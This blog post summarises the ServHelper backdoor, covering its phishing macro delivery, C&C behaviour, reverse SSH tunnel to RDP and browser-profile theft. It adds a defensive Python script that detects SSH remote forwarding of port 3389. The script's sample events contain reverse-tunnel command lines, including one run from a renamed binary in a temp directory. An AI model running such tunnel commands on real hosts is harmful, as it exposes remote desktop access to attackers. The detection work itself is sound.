
ServHelper Backdoor

ServHelper is a newly observed Delphi-based backdoor believed to have been created by the TA505 advanced persistent threat group. It appears to be in active development, with new variants published every few days.

It is delivered via malicious macros embedded in DOC, PUB, PDF and WIZ files distributed in phishing campaigns. When such a file is opened, the macro downloads and installs ServHelper. Some variants use links to file-hosting platforms in place of macros.

Once installed, it connects to a command and control server and awaits further commands. Newer variants also attempt to establish an SSH tunnel to port 3389 and can monitor web browser profiles on affected devices.

The malware possesses several features, such as:

  • maintains keep-alive functionality;
  • connects the C&C server to the host’s RDP port (3389) via a reverse SSH tunnel;
  • copies Firefox and Chrome web browser profiles;
  • runs an executable downloaded from a specified URL;
  • removes the malware payload;
  • supports many other commands.
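As a defender-side illustration of the reverse SSH tunnel behaviour listed above, here is an added example (not from the original post) that triages process-creation events for a client requesting remote port forwarding to the host's RDP port 3389. The event format, image names and command lines are constructed assumptions, not real telemetry.

```python
# Constructed Sysmon-style process-creation events (assumed format, not real telemetry).
SAMPLE_EVENTS = [
    # Hypothetical renamed SSH client dropped in a temp directory, forwarding RDP out.
    {"image": r"C:\Windows\Temp\svc.exe",
     "cmdline": r"C:\Windows\Temp\svc.exe -N -R 8080:127.0.0.1:3389 user@203.0.113.10"},
    # Legitimate client binary, but still exposing local RDP to a remote host.
    {"image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "cmdline": r"ssh -R 0.0.0.0:2222:localhost:3389 -p 443 user@198.51.100.7"},
    # Local (-L) forward to an intranet web server: benign for this rule.
    {"image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "cmdline": r"ssh -L 8080:intranet:80 user@198.51.100.7"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\notes.txt"},
]

# Well-known OpenSSH / PuTTY client binary names (assumption for this example).
KNOWN_SSH_CLIENTS = {"ssh", "ssh.exe", "plink.exe"}


def remote_forward_targets(cmdline):
    """Return the destination port of every '-R' remote forward in a command line.

    Handles both '-R spec' and the attached '-Rspec' form; the spec's last
    colon-separated field is the destination port ([bind:]port:host:hostport).
    """
    tokens = cmdline.split()
    ports = []
    for i, tok in enumerate(tokens):
        if tok == "-R" and i + 1 < len(tokens):
            spec = tokens[i + 1]
        elif tok.startswith("-R") and len(tok) > 2:
            spec = tok[2:]
        else:
            continue
        last = spec.rsplit(":", 1)[-1]
        if last.isdigit():
            ports.append(int(last))
    return ports


def is_known_ssh_client(image):
    """True when the process image is a recognised SSH client binary name."""
    return image.rsplit("\\", 1)[-1].lower() in KNOWN_SSH_CLIENTS


def triage(events, rdp_port=3389):
    """Flag events that remote-forward the RDP port; unknown binaries rank higher."""
    findings = []
    for ev in events:
        if rdp_port in remote_forward_targets(ev["cmdline"]):
            severity = "medium" if is_known_ssh_client(ev["image"]) else "high"
            findings.append((ev["image"], severity))
    return findings


if __name__ == "__main__":
    for image, severity in triage(SAMPLE_EVENTS):
        print(f"[{severity}] reverse SSH forward of RDP from {image}")
```

The rule keys on the forwarded destination port rather than the client name, so a renamed or bundled SSH binary is still caught and ranked higher than a known client.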


Duncan

Duncan is a technology professional with over 20 years' experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.
